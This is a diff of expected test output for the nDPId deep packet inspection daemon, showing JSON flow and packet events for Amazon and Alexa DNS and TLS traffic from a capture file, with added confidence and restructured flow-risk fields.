+00783{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":850,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976064333,"flow_last_seen":1490976064448,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1490976064448,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":44475,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.85.209.216"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":851,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976064452,"flow_last_seen":1490976064452,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976064452,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54434,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":851,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1490976064452,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976064452,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8L2dAAEAGLj+sECrYNFXR2NSiAbtfxHgaAAAAAKAC\/\/9kOQAAAgQFtAQCCAoA9ld9AAAAAAEDAwg="}
-00876{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":854,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976064328,"flow_last_seen":1490976064454,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1490976064454,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42148,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+00902{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":854,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976064328,"flow_last_seen":1490976064454,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1490976064454,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42148,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":862,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1490976064505,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976064505,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqqU0VdHYrBAq2AG71KJ+bVwJX8R4G6AScSBROQAAAgQFtAQCCAptHVo6APZXfQEDAwg="}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":863,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1490976064519,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1490976064519,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0L2hAAEAGLkasECrYNFXR2NSiAbtfxHgbfm1cCoAQAVfvyQAAAQEICgD2V4NtHVo6"}
-00820{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":864,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976064452,"flow_last_seen":1490976064520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1490976064520,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54434,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"5ee142340adf02ded757447e2ff78986","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00874{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":869,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976064452,"flow_last_seen":1490976064578,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":673,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1490976064578,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54434,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"5ee142340adf02ded757447e2ff78986","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":864,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976064452,"flow_last_seen":1490976064520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1490976064520,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54434,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"5ee142340adf02ded757447e2ff78986","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":869,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976064452,"flow_last_seen":1490976064578,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":673,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1490976064578,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54434,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"5ee142340adf02ded757447e2ff78986","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":898,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976067916,"flow_last_seen":1490976067916,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1490976067916,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":60804,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":898,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1490976067916,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976067916,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8WlhAAEARM1+sECrYrBAqAe2EADUAKHojSVQBAAABAAAAAAAAA2FwaQZhbWF6b24DY29tAAABAAE="}
-00741{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":898,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976067916,"flow_last_seen":1490976067916,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1490976067916,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":60804,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"api.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":898,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976067916,"flow_last_seen":1490976067916,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1490976067916,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":60804,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"api.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":899,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1490976067965,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"ts_msec":1490976067965,"pkt":"ePiC0\/vCAMDKkaPvCABFAABM1zdAAEARtm+sECoBrBAq2AA17YQAOOTBSVSBgAABAAEAAAAAA2FwaQZhbWF6b24DY29tAAABAAHADAABAAEAAAAsAAQ27x2S"}
-00755{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":899,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976067916,"flow_last_seen":1490976067965,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1490976067965,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":60804,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"api.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.29.146"}}
+00781{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":899,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976067916,"flow_last_seen":1490976067965,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1490976067965,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":60804,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"api.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.29.146"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":900,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976067968,"flow_last_seen":1490976067968,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976067968,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.146","src_port":41691,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":900,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1490976067968,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976067968,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8kvdAAEAGfFusECrYNu8dkqLbAbtu3MorAAAAAKAC\/\/\/lJAAAAgQFtAQCCAoA9ljcAAAAAAEDAwg="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":901,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":1490976068061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976068061,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw1NlAAOcGk4Q27x2SrBAq2AG7otunydf3btzKLHASH\/7bQAAAAgQFtAEDAwY="}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":902,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_packet_id":3,"flow_last_seen":1490976068064,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976068064,"pkt":"AMDKkaPvePiC0\/vCCABFAAAokvhAAEAGfG6sECrYNu8dkqLbAbtu3Mosp8nX+FAQAVclsgAA"}
-00853{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":903,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976067968,"flow_last_seen":1490976068066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1490976068066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.146","src_port":41691,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00910{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":907,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976067968,"flow_last_seen":1490976068174,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1681,"flow_avg_l4_payload_len":240,"midstream":0,"ts_msec":1490976068174,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.146","src_port":41691,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
-01241{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":909,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976067968,"flow_last_seen":1490976068174,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3551,"flow_avg_l4_payload_len":394,"midstream":0,"ts_msec":1490976068174,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.146","src_port":41691,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.amazon.com","server_names":"api.amazon.com,wsync.us-east-1.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=api.amazon.com","fingerprint":"1D:A3:CD:C3:06:9E:9B:A0:61:1E:1A:75:55:C1:A8:B0:DC:F8:75:2D"}}
+00959{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":903,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976067968,"flow_last_seen":1490976068066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1490976068066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.146","src_port":41691,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":907,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976067968,"flow_last_seen":1490976068174,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1681,"flow_avg_l4_payload_len":240,"midstream":0,"ts_msec":1490976068174,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.146","src_port":41691,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
+01347{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":909,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976067968,"flow_last_seen":1490976068174,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3551,"flow_avg_l4_payload_len":394,"midstream":0,"ts_msec":1490976068174,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.146","src_port":41691,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.amazon.com","server_names":"api.amazon.com,wsync.us-east-1.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=api.amazon.com","fingerprint":"1D:A3:CD:C3:06:9E:9B:A0:61:1E:1A:75:55:C1:A8:B0:DC:F8:75:2D"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":958,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071237,"flow_last_seen":1490976071237,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976071237,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":958,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1490976071237,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976071237,"pkt":"AMDKkaPvePiC0\/vCCABFAAA870hAAEAGV6asECrYNF7ohsHGAFAgR7VrAAAAAKAC\/\/9hTwAAAgQFtAQCCAoA9lojAAAAAAEDAwg="}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":959,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071286,"flow_last_seen":1490976071286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976071286,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45693,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -369,81 +369,81 @@
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":960,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1490976071306,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976071306,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8mshAAEAGrCasECrYNF7ohrJ+AbvI+MDiAAAAAKAC\/\/+6\/AAAAgQFtAQCCAoA9loqAAAAAAEDAwg="}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":961,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071312,"flow_last_seen":1490976071312,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1490976071312,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":25081,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":961,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1490976071312,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1490976071312,"pkt":"AMDKkaPvePiC0\/vCCABFAAA+WllAAEARM1ysECrYrBAqAWH5ADUAKtG2BusBAAABAAAAAAAABWFsZXhhBmFtYXpvbgNjb20AAAEAAQ=="}
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":961,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071312,"flow_last_seen":1490976071312,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1490976071312,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":25081,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":961,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071312,"flow_last_seen":1490976071312,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1490976071312,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":25081,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":962,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_packet_id":2,"flow_last_seen":1490976071322,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976071322,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw3TJAAOcGwsc0XuiGrBAq2ABQwcY3D6dGIEe1bHASH\/76HQAAAgQFtAEDAwY="}
